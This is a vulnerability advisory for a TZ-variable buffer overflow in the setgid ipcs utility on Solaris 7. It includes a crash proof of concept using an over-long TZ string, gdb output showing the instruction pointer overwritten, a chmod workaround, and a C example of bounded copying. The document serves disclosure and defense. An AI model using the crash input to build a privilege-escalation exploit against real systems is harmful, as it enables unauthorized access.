Vulnerability: ipcs

Affected: Solaris 7 x86 (other Solaris versions are most likely affected also)

Description:

Marc Maiffret found the following. He has discovered a buffer overflow in the /usr/bin/i86/ipcs utility provided with Solaris 7. The problem exists in the parsing of the TZ (TIMEZONE) environment variable. By exploiting this vulnerability an attacker can achieve local sys group privileges. ipcs is used for gathering information on active inter-process communication facilities. Exploitation of this vulnerability would be very difficult, but not impossible.

    bash-2.03$ TZ=`perl -e 'print "A"x1035'`
    bash-2.03$ /usr/bin/i86/ipcs
    IPC status from  as of Wed Apr 11 17:18:59 [buffer] 2001
    Message Queue facility inactive.
    T         ID      KEY        MODE        OWNER    GROUP
    Shared Memory:
    m          0   0x500004d3 --rw-r--r--     root     root
    Semaphore facility inactive.
    Segmentation Fault (core dumped)

Note: [buffer] is any 1036 (or so) character string of A's.

    bash-2.03$ su root
    Password:
    # gdb /usr/bin/i86/ipcs core
    GNU gdb 5.0
    Copyright 2000 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    <snip>
    #0  0x41414141 in ?? ()
    (gdb) info reg eip
    eip            0x41414141       0x41414141
    (gdb)

Solution:

Sun Microsystems has been contacted. They are currently working on patches for this and other related vulnerabilities eEye has discovered.

Workaround:

    chmod -s /usr/bin/i86/ipcs

This will remove the setgid bit from /usr/bin/i86/ipcs, so if someone does exploit this vulnerability, they won't gain higher privileges.
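The bug class described above is an unbounded copy of an environment value into a fixed-size buffer. The following C example is added here for illustration and is not the Solaris ipcs source: the buffer size, the function names and the way TZ is consumed are all assumptions. It shows the unsafe pattern next to a bounded form that refuses an over-long value instead of overrunning the stack, which is the fix a maintainer would apply alongside dropping the setgid bit.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stack buffer size for a timezone string (assumption, not the
 * real ipcs value; the advisory only tells us that ~1036 bytes overrun it). */
#define TZ_BUF_LEN 64

/* Unsafe pattern: copy whatever is in TZ with no length check. With a long
 * TZ this overruns dst, which is what the 0x41414141 EIP in the advisory
 * shows. Kept here only as the "before" form; nothing below calls it. */
void copy_tz_unbounded(char *dst, const char *tz)
{
    strcpy(dst, tz);
}

/* Hardened form: copy only if the value, including its NUL, fits in dst.
 * Returns 0 on success, -1 if tz is missing or too long for the buffer. */
int copy_tz_bounded(char *dst, size_t dstlen, const char *tz)
{
    if (tz == NULL || dst == NULL || dstlen == 0)
        return -1;
    size_t n = strnlen(tz, dstlen);   /* never scan past dstlen bytes */
    if (n == dstlen)
        return -1;                    /* no terminator within the buffer */
    memcpy(dst, tz, n + 1);           /* n chars plus the NUL */
    return 0;
}

/* Helper for demonstration: build a constructed TZ of n 'A' characters
 * (like the perl one-liner in the advisory) and report whether the bounded
 * copy rejects it. Returns 1 if rejected, 0 if accepted, -1 on alloc failure. */
int long_tz_is_rejected(size_t n)
{
    char *tz = malloc(n + 1);
    if (tz == NULL)
        return -1;
    memset(tz, 'A', n);
    tz[n] = '\0';

    char buf[TZ_BUF_LEN];
    int rejected = (copy_tz_bounded(buf, sizeof buf, tz) != 0);
    free(tz);
    return rejected;
}

int main(void)
{
    char buf[TZ_BUF_LEN];
    const char *tz = getenv("TZ");

    if (copy_tz_bounded(buf, sizeof buf, tz) == 0)
        printf("TZ accepted: %s\n", buf);
    else
        printf("TZ missing or longer than %d bytes, refusing to parse it\n",
               TZ_BUF_LEN - 1);

    /* Same check against the constructed 1035-byte value from the advisory. */
    printf("1035 x 'A' rejected: %d\n", long_tz_is_rejected(1035));
    return 0;
}
```

The defensive point is the failure mode: a privileged program that parses attacker-controlled environment variables must treat their length as untrusted, and the `strnlen` bound means even the length check cannot be made to read past the buffer. The setgid removal in the workaround limits what a crash like the one shown can be turned into; the bounded copy removes the crash itself.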